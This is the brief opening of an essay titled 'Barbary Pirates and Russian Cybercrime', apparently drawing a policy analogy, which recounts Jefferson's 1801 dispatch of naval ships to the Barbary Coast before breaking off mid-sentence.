Barbary Pirates and Russian Cybercrime

In 1801, the United States had a small Navy. Thomas Jefferson deployed almost half that Navy—three frigates and a schooner—to the Barbary C...